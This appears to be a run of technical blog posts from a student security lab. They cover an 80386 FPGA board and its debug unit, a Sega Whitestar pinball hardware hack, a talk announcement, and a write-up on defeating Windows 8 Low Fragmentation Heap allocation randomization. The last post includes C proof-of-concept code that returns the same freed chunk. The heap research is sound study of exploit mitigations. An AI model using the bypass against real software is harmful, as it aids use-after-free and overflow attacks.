is used to flush instruction the prefetch queue after enabling protected mode in order to validate segment reloading. This code can be improved by the setting of an Interrupt Descriptor Table in addition of a Global Descriptor Table.org 0x8000 startup: lgdt [gdtr] ;; Load Glocal Descriptor Table mov eax, cr0 ;; Enable protected mode or eax, 1 mov cr0, eax jmp reload_segs ;; Flush prefetch queue reload_segs: mov ax, 0x10 ;; Reload segment selectors mov ds, ax mov es, ax mov fs, ax mov gs, ax mov ss, ax ;; ljmp 0x08:0xF8400 dw 0xEA66 ;; Reload CS and jump to application code dd 0xF8400 dw 0x08 align 16 gdt: ... gdtr: Limit dw gdtr - gdt - 1 Base dd 0xF0000 + gdt
A 32-bit application can then be located at 0xF8400. The internal RAM is segmented according to the following layout :
As the In-Sytem Memory Content Editor accepts a special binary format called MIF (Memory Initialization File), a dedicated OCaml script has been created to facilitate linking of several raw binary object files.
bin2mif -o fw.mif -b 0xF8000 0 \ # Memory base address -i pm.bin 0xF8000 0 \ # Jump to protected mode code -i app.bin 0xFC000 0 \ # Application code -i reset.bin 0xFFFF0 0 # Reset routine code
Providing debug facilities
Even though Altera’s FPGA provide an efficient internal signal analyser thanks to SignalTap, it is a real pain to make software debugging when the size of applications running on the
386
become significant. Adding a flexible on-chip debug facility based on the UART communication to this design is one of the main challenge of this project.Supervisor
The supervisor is designed using Altera’s QSys tool which assists the creation of systems based on the NIOS II soft-processor. This system is composed of a private on-chip memory which contains NIOS instructions and data, and of an UART which is connected to
FT230X
chip.The protocol between the host and the supervisor is pretty simple and it considers that the CPU is at any time in one of these states :
STOP
: CPU is stopped.RESET
signal is asserted.RUN
: CPU is running.IORD
/IOWR
: CPU is trying to perform an access to IO ports. Distinction between read and write operation is done. Those states are used to allow device emulation.BRK16
/BRK32
: CPU is ready to accept debug operations. Distinction between real and protected mode is done.
It is accurate to implement the protocol logic through NIOS software instead of having it hardwired in Verilog. However, directly handling
386
signals on the NIOS is inefficient due to execution speed of this system. The idea here is to export the386
signal handling job to an other module dedicated to it : the On-Chip Debug Unit.The OCD Unit can take the control of
386
buses at anytime by asserting theocd.en
signal, which disable the original bus controller described before. The communication between those two units is ensured by a dual-port shared memory accessible through Avalon bus and two PIO registers. The first one,OCD_CTL
, is used to reset the OCD Unit from supervisor. The second,OCD_STATUS
indicates if the unit is running or not. The shared memory contains a routine that must be applied on386
.On-Chip Debug Unit
This unit is basically a processor specially designed to handle
386
signals. It fetches its instructions from the 256 x 16-bit Avalon memory filled by the supervisor and operates on a 16 x 16-bit data space also located on shared memory.While supervisor can access OCD program and data unrestrictedly, the OCD Unit can only operates on its data space which corresponds to offset
0x100
from supervisor point of view. In the dedicated assembler, data memory is addressed usingR1
toR15
naming convention.module ocd ( // OCD Control input rst, // Connected to OCD_CTL input clk, // 40MHz clock (synchronous with 20MHz CPU clock) output reg en, // Asserted if OCD Unit is attached to the 386 output reg stop, // Connected to OCD_STATUS // 80386 signals ... // RAM signals (Avalon) ... );
Implementing this kind of processor is quite simple and a basic one will be based on the following state machine :
As Avalon memory signals are always latched, reading on it takes two clock cycles : the first cycle is used to latch the address value and the second one latches the result on the data bus. Taking that into account, execution of a single instruction which reads and writes on data memory cannot take less than five clock cycles.
- FETCH : Get instruction from program memory.
- LOAD : Latch source address into data memory.
- EXEC : Load source value from data memory and execute the instruction.
- STORE : Store result and compute next address of the next instruction.
- LATCH : Latch instruction address into program memory.
Instruction set is composed of several categories. The first one is used to control the OCD :
ATTACH
/DETACH
: Connect/Disconnect the OCD unit to 386 signals.
The second category includes instructions related to
386
signals processing :LDD d
: Load data bus value intod
register.LDAL d
/LDAH d
: Load address bus value intod
register.LDWR d
: LoadW/R#
signal intod
register.LDDC d
: LoadD/C#
signal intod
register.LDMIO d
: LoadM/IO#
signal intod
register.STD s
: Set data bus value tos
register value.START
/RESET
: Start/Reset the CPU.READY
: AssertREADY#
signal.
Of course, some instructions only operate on registers :
LDI d, imm16
: Load a 16-bit immediate intod
register.MOV d, s
: Moves
register value intod
register.CLR d
: Cleard
register.
Third category is about flow control. As the data memory only exposes one port to the OCD Unit, implementing a compare instruction which loads two registers is not possible in a single cycle. So a compare register as been added to the core. All comparisons will be related to that register.
LDCMP s
: Loads
register value into the compare register.CMP s
: Compares
register value with compare register value and store the result into the compare register.BA
/BEQ
/BNE addr
: Branch to the specified address according to compare register value.
As example, those instructions performs a jump to
label
if R1 is equal to R2 :LDCMP R1 ;; cmpr <- R1 CMP R2 ;; cmpr <- cmpr == R2 BEQ label ;; pc <- label if cmpr != 0
Some instructions can stay more than one cycle in the EXEC state order to wait for an acknowledge from the CPU during some bus operation :
HOLD
: AssertHOLD
signal and wait forHOLDA
signal.INT
: AssertINT
signal and wait forINTA
signal.EXIT
: Stop OCD routine execution. Never leaves EXEC state and assertocd.stop
signal.
This wait state mechanism is also used to implement instructions used to wait for a particular event on the bus. All those instructions deassert
READY#
signal and attach theOCD
to the386
when the expected condition is triggered.WAITADS
: Wait forADS#
signal to be assertedWAITIO
: Wait forADS#
andM/IO#
getting lowWAITLOCK
: Wait forADS#
andLOCK#
to be asserted
The block diagram of this unit can be represented as :
Here is routines used to reset and start the CPU from OCD Unit. Notice that the start routine let the original bus controller operates on the
386
until an IO access is performed. The supervisor has just to be interrupted when the OCD is exited from the start routine to handle the IO request. Devices can then be emulated by the supervisor or by the host..func ocd_prgm_reset RESET ;; RESET <- 1 EXIT .func ocd_prgm_start START ;; RESET <- 0 DETACH ;; Let bus controller to handle CPU signals WAITIO ;; Wait for IO access to attach OCD Unit LDAL R1 ;; Get IO port address LDWR R2 ;; Get IO operation type EXIT
Example : Obtaining CPU registers
Now that the OCD Unit internals have been presented, the purpose now is to use it to get CPU registers.
Before applying debug operations on the CPU, it is necessary to stop execution and set it up in a known state. The simplest method to interrupt a
386
without having to mind about the interrupt flag is to send a Non Maskable Interrupt. UnlikeINTR
signal,NMI
mechanism does not provide any acknowledge from the CPU. So the way only to know if the CPU actually took into account the NMI is to waitLOCK#
signal assertion. Indeed, the386
locks the whole bus when it accesses an IDT or IVT entry. TheWAITLOCK
instruction has been designed for that specific purpose..func ocd_prgm_break NMI ;; Set NMI signal WAITLOCK ;; Wait for ADS# and LOCK# signals then attach OCD unit
On the next step, the behaviour of the CPU is different according to its mode. If the
386
is still in real mode, it will fetch the code segment and the offset of the NMI handler located on the Interrupt Vector Table. As IVT always starts at0x0000000
, the address0x0000008
will be outputted after triggering the NMI.In the other hand, if protected mode is enabled, the CPU will fetch an Interrupt Descriptor corresponding of the NMI interrupt. This structure is located on the Interrupt Descriptor Table which can be found anywhere on the address space.
As the processor mode is unknown at that moment, it can be deduced from the first requested address after NMI :
;; Get CPU Mode LDAL R2 ;; Load requested address LDAH R3 LDCMP R2 LDI R1, 0x0008 CMP R1 BNE break_protected_mode ;; Branch to protected mode handler if ;; A[15:0] != 0x0008 LDCMP R3 BEQ break_real_mode ;; Branch to real mode handler if ;; A[23:16] is equal to the NMI entry ;; offset on the IVT
Only protected mode will be considered for the rest of the example.
As IDT set by the application cannot be trusted, using the OCD Unit to drive a valid interrupt gate is conceivable :
;; Fake IDT entry LDI R1, 0b1000111000000000 ;; Flags STD R1 WAITADS LDI R1, 0x000D ;; Offset[31:16] STD R1 WAITADS LDI R1, 0x0000 ;; Offset[15:0] STD R1 WAITADS LDI R1, 0x0008 ;; Segment Selector STD R1 WAITADS
A code segment reload is always performed before jumping to the interrupt handler. So a read to a GDT entry will be requested by the CPU.
In the same way, it is painless with this mechanism to drive a valid code segment :
;; Fake GDT entry LDI R1, 0b1001101000000000 ;; Flags | Base[23:16] STD R1 WAITADS LDI R1, 0x00CF ;; Base[31:24] | G | D/B | Limit[19:16] STD R1 WAITADS LDI R1, 0xFFFF ;; Limit[15:00] STD R1 WAITADS LDI R1, 0x0000 ;; Base[15:0] STD R1 WAITADS READY ;; GDT Access bit WAITADS
Finally, as
EFLAGS
,EIP
andCS
registers have been modified, they are pushed on the stack. However the bus controller is disconnected from CPU signals : this means that no actual write on the memory are performed during this operation. Instead, it is straightforward to load those values into OCD registers :;; Context saving LDD R2 ;; EFLAGS[15:0] READY WAITADS LDD R3 ;; EFLAGS[31:16] READY WAITADS LDD R4 ;; CS READY WAITADS LDD R5 ;; EIP[15:0] READY WAITADS LDD R6 ;; EIP[31:16] READY
Afterwards, the CPU will try to fetch instructions from the interrupt handler. So
HOLD
signal is asserted at the end of thebreak
routine. This leaves the supervisor time to load the next routine to the OCD program memory.At this point,
386
is on a known and valid state which allows us to inject any instructions sequences. In order to obtain CPU registers, thepusha
instruction can be injected :.func ocd_prgm_get_regs LDI R1, 0x9060 LDI R2, 0x9090 WAITADS ;; Fill instruction prefetch queue STD R1 ;; Drive PUSHA; NOP WAITADS STD R2 ;; Drive NOP; NOP WAITADS STD R2 ;; Drive NOP; NOP WAITADS STD R2 ;; Drive NOP; NOP WAITADS STD R2 ;; Drive NOP; NOP WAITADS ;; PUSHA LDD R0 READY WAITADS ... LDD R15 READY HOLD ;; Hold CPU in order to avoid instruction fetch during ;; loading of the next OCD routine EXIT
However,
pusha
instruction modifiesESP
value. In the same way, amov
instruction can be used to restoreESP
and set any register value.When debugging phase is over, a continue routine is executed which basically inject an
iret
and drive original values ofEIP
,CS
andEFLAGS
.For now, the debug unit is provided with a CLI interface allowing simple CPU interactions. When more debug features will be available, the goal is to embed a gdb stub into the host application.
[lsepc-monitor] start [lsepc-monitor] status CPU Status: RUN [lsepc-monitor] break [lsepc-monitor] status CPU Status: Break (Protected Mode) [lsepc-monitor] getregs EFLAGS: 00000046 EIP: 000fd024 ESP: ffe4000c EBP: 00000123 EAX: 1100bbaa EBX: 5544000f ECX: 9988ffee EDX: ddcc7766 ESI: 456789ab EDI: cdef9090 CS: 0008 [lsepc-monitor] continue [lsepc-monitor] status CPU Status: RUN
Conclusion
Developing and testing on the LSE-PC is still mainly based on the JTAG interface. When connected to a JTAG interface, the FPGA design exposes the following entry points :
- RAM/ROM editor : used to perform on-chip operation on the internal memory
- NIOS II interface : used to program and debug the NIOS II contained on the supervisor
- Serial Flash Loader : used to program the SPI flash which contains FPGA configuration
- SignalTap : used to perform signal analysis.
This board is still a proof a concept. However, its composition was an excellent exercise to understand how the original
80386
CPU works under the hood.Although some work need to be done to get a profitable on-chip debugger, the hardware part and the simple chipset embedded are reliable enough to allow execution of simple applications.
Links
References
- It is basically a cut-down version of the original
LSE Summer Week 2015 Announcement
For the fifth year, we are going to give 4 days of talks to show the work we are doing here at the LSE, about various themes we like, have encountered or overall judge interesting.
The schedule will be as follows:
- July, Wednesday the 15th in the evening
- July, Thursday the 16th in the evening
- July, Friday the 17th in the evening
- July, Saturday the 18th all day
The exact planning and subjects addressed will be announced later, as well as the exact timetable. As we did last year, we are also opening the talks to external contributors and all LSE members, present or past.
The presentations will be held in French as usual and we will try to record everything.
If you want to propose a talk, you can contact us at contact@lse.epita.fr or on #lse@rezosup. The deadline for submitting content is June 26.
The official page of the LSE Summer Week 2015 is available in French here.
Hacking a Sega Whitestar Pinball
Sega Starship Troopers Pinball Overview
The
Sega Starship Troopers Pinball
is fairly representative of the WhiteStar Board System used in several Sega pinball games and Stern Pinball. This hardware architecture was firstly designed in 1995 for the Apollo 13 game with the objective to be convenient and extensible in order to be reusable for other playfields. This way, Sega could exploit a large number of licenses without having to design new control circuits for each machine.This architecture is based on three Motorola
68B09E
clocked at 2MHz and used as main CPU, display controller and sound controller. The two last are mainly dedicated to monitor application-specific processors: for instance, the6809
used on the display board is charged to interface a68B45
CRT controller to the main CPU. The sound processing is handled by aBSMT2000
, a custom masked-rom version of theTI TMS320C15
DSP.Sega used this system for 16 other games including GoldenEye, Star Wars and Starship Troopers.
Playfield’s wiring
The playfield wiring is quite simple: all switches are disposed in a matrix grid. This method provides a simple way to handle a high number of I/O with a reasonable number of connectors. So, in order to read the switches state, the CPU has to scan each raw of the matrix by grounding it and watching in which column the current is flowing.
A similar circuit is used to control playfield lamps: each raw has to be scanned by grounding it and applying voltage on the column connector according to lamps that have to be switched on the selected raw.
It’s truly easy to control a high number of lamps with this layout. The following code switches on the lamp 31 (multiball).
lda #$8 sta LAMP_ROW ;; Ground selected row clra sta LAMP_AUX ;; Clear auxiliary rows lda #$40 sta LAMP_COL ;; Drive selected column
Although playfield switches are handled by the matrix grid, some frequently used buttons are connected to a dedicated connector. This allows the CPU to directly address this input without having to scan the entire input matrix. These switches are user buttons and End-Of-Stroke.
The E.O.S switch prevents foldback when the player has the flipper energized to capture balls. When the Game CPU detects that this switch is open, it stabilizes the position of the selected flip by reducing the pulse applied to the coil.
The Backbox
The Backbox contains all the electronic circuits controlling playfield’s behaviour. We will focus on this very part throughout the article.
CPU/Sound Board
The main board contains the Game CPU and the Sound circuit. The switches are directly connected to this board so that it is really simple for the CPU to fetch their values.
One of the main problems of this board is the battery location. Populated with a 3xAA battery holder to keep the RAM content alive, alkaline batteries are located on top of the CPU, ROM and RAM chip, which is critical when they will start to leak on this components. Before I started playing with this machine, I spend hours restoring and cleaning the PCB because of the corrosive leaking. To avoid deterioration, relocating this battery could be a smart idea.
Display Controller Board
Like many pinball machines from the 90s, the backbox is equipped with an old school dot matrix display.
As the CPU Board, it is based on a Motorola
68B09E
with a dedicated 512MB UVPROM which contains the dot matrix display driver code and images that can be displayed on it. It communicates with the main board via a specific protocol.To interface the raster display, the board uses a Motorola
68B45
(68B45 CRTC
for “cathode ray tube controller”). Although this chip was primarily designed to control the CRT display, it can also be used to generate correctly timed signal for a raster dot matrix display like in this case.I/O Power Driver Board
The IO Power Driver Board is an interface between the low current logic circuit and the high current playfield circuit.
The first part of this circuit consists of converting the alternative current provided by the transformer into exploitable direct current thanks to 5 bridges rectifiers.
The only electromagnetic relay is dedicated to the general illumination and is not controllable via the main CPU. The rest is driven by MOSFET power transistors which are designed to be able to handle high current in order to power playfield coils. Moreover, fuses are placed before each bridges rectifiers in order to easily help identifying where the problem comes from in case of failure.
Upgrading the firmware
The title screen displayed in the dot matrix plasma display indicates that the firmware’s version is
2.00
. However, an up-to-date image of this ROM exists in Internet Pinball Database which seems to be on version2.01
according to the ascii string located at offset$66D7
. Let’s try to upgrade the pinball!An almost suitable flash memory to replace the original UVPROM is the
A29040C
. The only mismatches on the pinout are theA18
andWE
pins. This is a minor problem since I fixed the PCB to match theA29040C
layout.Burning the
A29040C
with the new firmware requires a flash memory programmer. I decided to craft one with anArduino mega 1280
based on anAVR Atmega 1280
microcontroller. The large number of IO of this chip is essential to complete the programming protocol of theA29040C
.After successfully programming the flash memory, I was pretty disappointed when I noticed that the new ROM chip was still not working.
I thought that this UVPROM was able to store 512KB of data, just like
A29040C
. It took me a while to realise that the game is a 128KB ROM although the chip is designed to be connected to a 19 bit address bus. This means that the game’s ROM simply ignores the value ofA17
andA18
signals, which means that the game code is mirrored 4 times in the whole ROM address space.Building a custom ROM
Now that we are able to substitute the original ROM with a custom flash memory, let’s try to run our own code on this machine.
The first thing that we have to do in this case is to determine where the CPU will fetch its first instruction after a reset. According to the
6809
datasheet, the interrupt vector table (which contents the address of thereset
event handler) is located at0xFFFE
. However, this offset refers to the CPU address space, not that of the ROM chip. So, after a reset, which part of this memory is mapped at0xFFFE
?To answer this, it’s essential to follow the address bus of the UVPROM. We then easily see that bits 14 to 18 of this bus are connected to 5-bit register (
U211
) while bits 13 to 0 are directly bound to CPU address bus.This is a typical configuration to implement a bank system since the CPU address space is too narrow to map the entire ROM. That’s why only one part of it (also called a bank) is mapped at a given time. The mapped bank is chosen by the
U211
register, calledXA
, and can be easily wrote by the CPU when a bank switching is needed.Finding address space
On this kind of device, it’s always painful to debug the code running directly on the board. The only way to achieve it here is to trigger some visual element of the playfield in order to get a basic tracing of the execution flow.
As there is no IO port on the
6809
, all devices are memory-mapped. The question now is: where are they located?First, let’s focus on the address decoding circuit of the IO Board.
In order to simplify cascading, the
74138
multiplexer generates output only if the Boolean expressionG1 && !G2A && !G2B
is true. So, in this circuit,U204
covers IO addresses from0x0
to0x7
andU205
handles from0x8
to0xF
.As we can see on this schematic, the question is: where does the
IOSTB
signal come from?Following the wire, we can see that this control signal is generated by the CPU Board. It actually acts as a chip select: it means that this signal is used to indicates to the IO Board that we are addressing it.
To be more precise, the
IOSTB
is driven by theU213
chip, aPAL16L8
(Programmable Array Logic). This kind of integrated circuit is used to implement combinatoric logic expressions. This is widely used for address decoding.Dumping the logical expression programmed on this chip is essential to determine the actual CPU address space. One way to do it is to basically test all possible inputs and watch how outputs evolves according to input values. However, some of the
PAL16L8
pins can be considered as inputs as well as outputs. In this case, we can guess thatXA0
,A9
andA10
are used as input pins according to the rest of the circuit.I desoldered the PAL, in order to prevent undesired side effect on the rest of the circuit, and used a simple Arduino Uno to generate the truth tables of all outputs.
Now, let’s extract irreducible logical expressions from the recorded truth tables. As a matter of fact, these truth tables are significantly too large to apply the well-known Karnaugh map method to simplify the extended logical expression. This problem can be solved by using the electruth python module. It fully implements the Quine-McCluskey method which is perfectly suitable in this situation.
After a few hours of computation, I got these expressions, which are truly helpful in the address space determination process:
~ROMCS = A15 || A14 ~RAMCS = !A15 && !A14 && !A13 && (!A12 || !A11 || !A10 || !A9 || RW || MPIN) IOPORT = !(!A15 && !A14 && A13 && !A12 && !A11 && !XA0) IOSTB = !A15 && !A14 && A13 && !A11
Notice the
MPIN
input which is a signal generated by the cabinet door when it’s open. So, thePAL
restricts the access to a small part of the RAM when the coin door is closed. This section is actually used to store game settings that are only editable for maintenance purpose.Here is the address space that I was finally able to discover according to the actual wiring:
0000
-1FFF
: RAM0000
-1DFF
: Read/Write Area1E00
-1FFF
: Write Protected Area
2000
-27FF
: IO (IOBOARD)2000
: HIGH CURRENT SOLENOIDS A- bit 0 : Left Turbo Bumper
- bit 1 : Bottom Turbo Bumper
- bit 2 : Right Turbo Bumper
- bit 3 : Left Slingshot
- bit 4 : Right Singshot
- bit 5 : Mini Flipper
- bit 6 : Left Flipper
- bit 7 : Right Flipper
2001
: HIGH CURRENT SOLENOIDS B- bit 0 : Trough Up-Kicker
- bit 1 : Auto Launch
- bit 2 : Vertical Up-Kicker
- bit 3 : Super Vertical Up-Kicker
- bit 4 : Left Magnet
- bit 5 : Right Magnet
- bit 6 : Brain Bug
- bit 7 : European Token Dispenser (not used)
2002
: LOW CURRENT SOLENOIDS- bit 0 : Stepper Motor #1
- bit 1 : Stepper Motor #2
- bit 2 : Stepper Motor #3
- bit 3 : Stepper Motor #4
- bit 4 : not used
- bit 5 : not used
- bit 6 : Flash Brain Bug
- bit 7 : Option Coin Meter
2003
: FLASH LAMPS DRIVERS- bit 0 : Flash Red
- bit 1 : Flash Yellow
- bit 2 : Flash Green
- bit 3 : Flash Blue
- bit 4 : Flash Multiball
- bit 5 : Flash Lt. Ramp
- bit 6 : Flash Rt. Ramp
- bit 7 : Flash Pops
2004
: N/A2005
: N/A2006
: AUX. OUT PORT (not used)2007
: AUX. IN PORT (not used)2008
: LAMP RETURNS2009
: AUX. LAMPS200A
: LAMP DRIVERS
3000
-37FF
: IO (CPU/SOUND BOARD)3000
: DEDICATED SWITCH IN- bit 0 : Left Flipper Button
- bit 1 : Left Flipper End-of-Stroke
- bit 2 : Right Flipper Button
- bit 3 : Right Flipper End-of-Stroke
- bit 4 : Mini Flipper Button
- bit 5 : Red Button
- bit 6 : Green Button
- bit 7 : Black Button
3100
: DIP SWITCH3200
: BANK SELECT3300
: SWITCH MATRIX COLUMNS3400
: SWITCH MATRIX ROWS3500
: PLASMA IN3600
: PLASMA OUT3700
: PLASMA STATUS
4000
-7FFF
: ROM8000
-BFFF
: ROM (Mirror)C000
-FFFF
: ROM (Mirror)
Handling reset circuitry
In this kind of real-time application, where a huge number of unpredictable events have to be handled, the risk of race condition cannot be fully faded.
Although the software is designed to be able to face any situations, the hardware has to be prepared to a faulty program. One of the simplest and more robust method is to use a watchdog timer. This consists of an autonomous timer charged to trigger a reset signal to the system if it reaches its initial point. The main idea here is to force the circuitry to be stopped if it does not correctly respond in order to prevent any damage from uncontrolled behaviour.
In most cases, the timer has to be fed by the software running on the CPU. So, if we want to run our own code on that machine, it’s essential to implement as a subroutine the reset of the watchdog in order to stay alive.
In the Whitestar pinball, two distinct watchdogs have to be correctly handled. The first one is located on the CPU/Sound Board and is directly connected to the reset pin of the
6809
. SEGA engineers chose to use aDS1232
chip (U210
) which integrates all the features that are commonly used to monitor a CPU. So, in addition to a regular watchdog timer, this chip also provides a power monitoring and an external override which is actually designed to allow the use of a push button to force the CPU reset (SW200
).As the
TOL
pin of this chip is grounded, theDS1232
continually watches the voltage applied onVcc
pin and triggers a reset signal if its value is under 4.7V. From a software engineer point of view, the important pin in that case is the strobe input (ST
): it is used to reset the watchdog timer when a falling edge is applied to it.On the CPU/Sound Board, this pin is connected to either clock signal (generated by
U2
) orBSEL
signal according to the location of the jumper (Wx
orWy
). AsWx
was jumpered on my board, we can assume that the configuration in whichWy
is fit was used during firmware development. So programmers were able to test their code without having to mind about the watchdog reset: this was automatically done by the clock signal. When the pinball was about to be released, calls to the watchdog reset subroutine were injected in appropriate parts of the firmware and the jumper was moved fromWy
toWx
.In my opinion, modifying the hardware by desoldering the jumper and resoldering it on
Wy
is a little bit too easy to solve this kind of problem. So, let’s try to handle the watchdog timer with a suitable software subroutine.The
BSEL
signal is generated when writing at address0x3200
and is actually used as clock signal for the bank selection (U211
). This is a clever way to get a nonintrusive watchdog reset subroutine: it’s, in fact, hooked on the bank switching mechanism. The hardware designers probably thought it was a good idea to check the regularity of the code execution only by testing a periodic bank switching…In our case, we do not need to switch from initial bank. The trick I used here is to write
0
in theXA
register, so the bank is unchanged but the watchdog is fed anyway.The second watchdog is located on the IO Board. The chip used is still a
DS1232
(U210
) but the wiring is a little bit different. Firstly, since there is no code running on that board, the reset pin of theU210
is not connected to a CPU but to all registers (8-bit D flip-flop) which drive power transistors.Secondly, there is no reset pushbutton on the IO Board. The
PBRESET
pin is connected to theBRESET
signal coming directly from the CPU/Sound board. So, if the firstDS1231
triggers a reset signal, it automatically overrides the second watchdog timer and forward the signal to all IO Board components. However, this is not reciprocal: the IO Board cannot stops the CPU/Sound Board.The strobe input of this watchdog is directly connected to the
DAV0
signal which is used to ground the first raw of the lamp matrix. This means that the firmware has to frequently scan it to keep the IO Board alive. Tricky, but not fully irrelevant since the lights are still blinking on this kind of arcade machine in order to keep the game catchy.All of this reset circuitry have to be kept in mind when developing a firmware for this kind of platform.
Final code
After many hours spent to reverse engineer the hardware part of this machine, I was finally able to print LSE on the 7-segment display of the playfield thanks to the code fetched from a custom flash ROM.
Here is the assembly code of my own basic firmware:
LAMP_ROW EQU $2008 LAMP_AUX EQU $2009 LAMP_COL EQU $200A BANK_SELECT EQU $3200 ;; CPU/Board Watchdog reset wdr .MACRO clra sta BANK_SELECT .ENDM ;; Dummy delay subroutine delay .MACRO i lda i @l: deca bne @l .ENDM ;; Entry point .ORG 0xC000 main: ldx #lamps clrb stb LAMP_AUX ;; Clear auxiliary rows incb ;; Select first row loop: clra sta LAMP_ROW sta LAMP_COL ;; Clear rows and colunms delay #$1F ;; Dummy delay lda ,x+ ;; Fetch columns value sta LAMP_COL ;; Set columns stb LAMP_ROW ;; Ground selected row delay #$1F ;; Dummy delay wdr ;; Watchdog reset lslb ;; Select next row bne loop ;; Branch if the first 8 rows are not updated bcc main ;; Branch if the 9th row is updated rolb stb LAMP_AUX ;; Select the 9th row clrb bra loop ;; Lamp matrix values lamps: DB $01, $00, $00, $00, $00 DB $00, $1C, $B6, $9F, $00 ;; Interrupt vector table .ORG 0xFFFE reset: DW main
tpasm
is needed to assemble the preceding code and turn it into an Intel hex file using the following commands:$ tpasm -P 6809 -o intel cpu.hex cpu.s $ hex2bin ./cpu.hex $ dd if=/dev/zero of=cpu.rom bs=16K count=32 $ dd if=cpu.bin of=cpu.rom bs=16K seek=31
Conclusion
Hacking this kind of machine has been as rewarding for me as it is for some people to play flipper.
Unfortunatly, Sega Pinball left the market in 1999 (2 years after releasing the Starship Troppers pinball…) and sold all pinball assets to Stern Pinball, Inc. This company used the WhiteStar architecture until 2005 with NASCAR arcade machine. When The Lord of the Rings was released in 2003, they edited some part of the sound system by replacing the
Motorola 6809
/BSMT2000
duo by a 32-bitAtmel AT91SAM
ARM-based CPU and threeXilinx FPGAs
. So the6809-BSMT2000
system is fully emulated by this circuit to provide backward-compatibility.Now that we have hacked the hardware, what about reverse engineering the original firmware? Maybe another time…
I hope you enjoyed this guided tour!
References
Getting back determinism in the Low Fragmentation Heap
Introduction
The Low Fragmentation Heap is the Front End allocator for the userland in modern Windows OS. It has been introduced in 2001 in Windows XP and is used by default since Windows Vista. Microsoft has introduce a lot of new mitigations in response to
generic
attack against the LFH since its first disclosure in Windows XP. One of them, introduced in Windows 8, is the non-determinism of the allocation. This mitigation has quite a lot of consequences because it will break most of the overflows exploits but also use-after-free exploits.Low Fragmentation Heap
The goal of the Low Fragmentation Heap is, as its names says, to reduce the fragmentation. It is not a different heap but a different policy. Here is a global overview of how the allocation is made by Windows:
The HeapAlloc and HeapFree functions will make some tests and decide if it should call the back-end or the front-end, which means the LFH since the removal of the Look-Aside-List. There are some conditions for an allocation to be made by the LFH:
- The size must be inferior to 0x4000 bytes
- The LFH must be activated for this heap. It is possible to deactivate the LFH in a heap by setting HEAP_NO_SERIALIZE when creating a heap with HeapCreate.
- The LFH must be activated for this allocation. It is also possible to deactivate the LFH for a particular allocation (still with HEAP_NO_SERIALIZE).
- There must be enough allocation for activating the LFH for this size.
The function charge of the allocation for the LFH is
RtlpLowFragHeapAllocFromContext
and the one for the back-end isRtlpAllocateHeap
which will use the VirtualAlloc from the system.If you want more details about how the LFH works, you can look at my presentation in french about this subject during the lse summer week 2014, or read the excellent paper Windows 8 Heap Internals by Chris Valasek and Tarjei Mandt.
Mitigation
Microsoft has introduced two factors of randomization with Windows 8. The first one is to add a random offset for each virtual allocation, its primary goal is removing the predictability of heap metadata for preventing their corruption. The second is for randomizing the UserBlock returned by an allocation.
Before those changes, a simple code like this:
#include <Windows.h> #include <stdio.h> #include <iostream> int main() { HANDLE hHeap = GetProcessHeap(); int i = 0; int size = 0x40; LPVOID chunk; // lfh activation while (i < 0x10) { chunk = HeapAlloc(hHeap, 0, size); i++; } chunk = HeapAlloc(hHeap, 0, size); printf("\n\nchunk1: %p\n", chunk); HeapFree(hHeap, 0, chunk); chunk = HeapAlloc(hHeap, 0, size); printf("\n\nchunk2: %p\n", chunk); HeapFree(hHeap, 0, chunk); }
would give us an output which is predictable and will allow us to trigger a simple use-after-free:
chunk1: 011D8CC0 chunk2: 011D8CC0
The same code since Windows 8 will give us this result:
chunk1: 011D8CC0 chunk2: 011D8DE0
We can clearly see that the result is not easily predictable anymore. The next question is how is this implemented ? The implementation is pretty simple, in
RtlpCreateLowFragHeap
there is a call toRtlpInitializeLfhRandomDataArray
:It will basically fill the
RtlpLowFragHeapRandomData
array with 0x100 random values. This array will then be used with a value calledLowFragHeapDataSlot
from the TEB (Thread Environment Block) which is use for storing value by thread.mov ecx, large fs:18h ; getting the current TEB movzx esi, word ptr [ecx+0x0FAA] ; getting LowFragHeapDataSlot lea eax, [esi+1] ; adding 1 to LowFragHeapDataSlot and eax, 0xff ; checking we don't go past the 0x100 mov [ecx + 0x0faa], ax ; rewrite LowFragHeapDataSlot + 1 movzx eax, byte ptr RtlpLowFragHeapRandomData[esi] ; getting the value at offset of LowFragHeapDataSlot
This value is then used with a ror on the bitmap to determine the position where to start, and from this position it will look for the first free block in the bitmap which will allow to make two consecutive allocations to not be at predictable place.
Attacks
In 2008 at ruxcon, Ben Hawkes presented Attacking the Vista Heap in its slides he made several claims and more precisely :
Application specific attacks are the future
. This is probably more true than ever with a heap implementation like the one we get since Windows 8 and the non-determinism of the allocation is a big problem even for application specific attacks. This mitigations has been well documented but I haven’t found any documentation about how to bypass it.First attack
The first basic attack we can think of is the idea to fill all the slots except one with the object we want to overwrite. We then fill the last slot remaining with the object in which we can overwrite.
This technic will work perfectly for use-after-free because we don’t care about the data locate right before or right after it. On the contrary for a classic overflow we really care about what is after (I don’t consider underflow but it is basically the same principle). If you control the whole userblock you have fair chances of success: the only case for which it will not work is if we get the last chunk.
But if there is some allocations made for the user blocks the probability of success will decrease a lot because you have more position which will end with a failure.
It also means that you need to be able to allocate enough time the data you want to overflow which could not be the case and in the end you will not be able to know which one you overflowed so you will need a way to test this.
Second attack
In the mitigation part we saw that for getting a random value the
RtlpLowFragHeapAllocFromContext
function take a value from the pre-populatedRtlpLowFragHeapRandomData
array. This array is changed in only two occasions:- in the
RtlpInitializaLfhRandomDataArray
function when creating the LFH - in the
RtlpSubSegmentInitialize
function which is called byRtlpLowFragHeapAllocFromContext
when a subsegment needs initialization So basically this array is not re-populated often, and we can make allocation without the array being changed. The counter is stored in the TEB and is incremented after each use of the array. Since the counter must stay inferior to array’s size, a modulo 0x100 is made. That means that we can just make 0xff allocations and going back to the same position in the array. The following code will allow us to get twice the same chunk:
#include <Windows.h> #include <stdio.h> #include <iostream> int main() { HANDLE hHeap = GetProcessHeap(); char c; int i = 0; int size = 0x40; LPVOID chunk; // activating the LFH for the size we choose while (i < 0x10) { chunk = HeapAlloc(hHeap, 0, size); i++; } // making the allocation we want chunk = HeapAlloc(hHeap, 0, size); printf("chunk: %p\n", chunk); HeapFree(hHeap, 0, chunk); // making 0xff allocation for getting back // to the same point in the RtlpLowFragHeapRandomData i = 0; while (i < 0x100 - 1) { chunk = HeapAlloc(hHeap, 0, size); HeapFree(hHeap, 0, chunk); i++; } // reallocating : we get the same chunk chunk = HeapAlloc(hHeap, 0, size); printf("chunk: %p\n", chunk); }
So even if we don’t know where the allocation took place we get back to our first result with twice the same chunk:
chunk: 012A9A40 chunk: 012A9A40
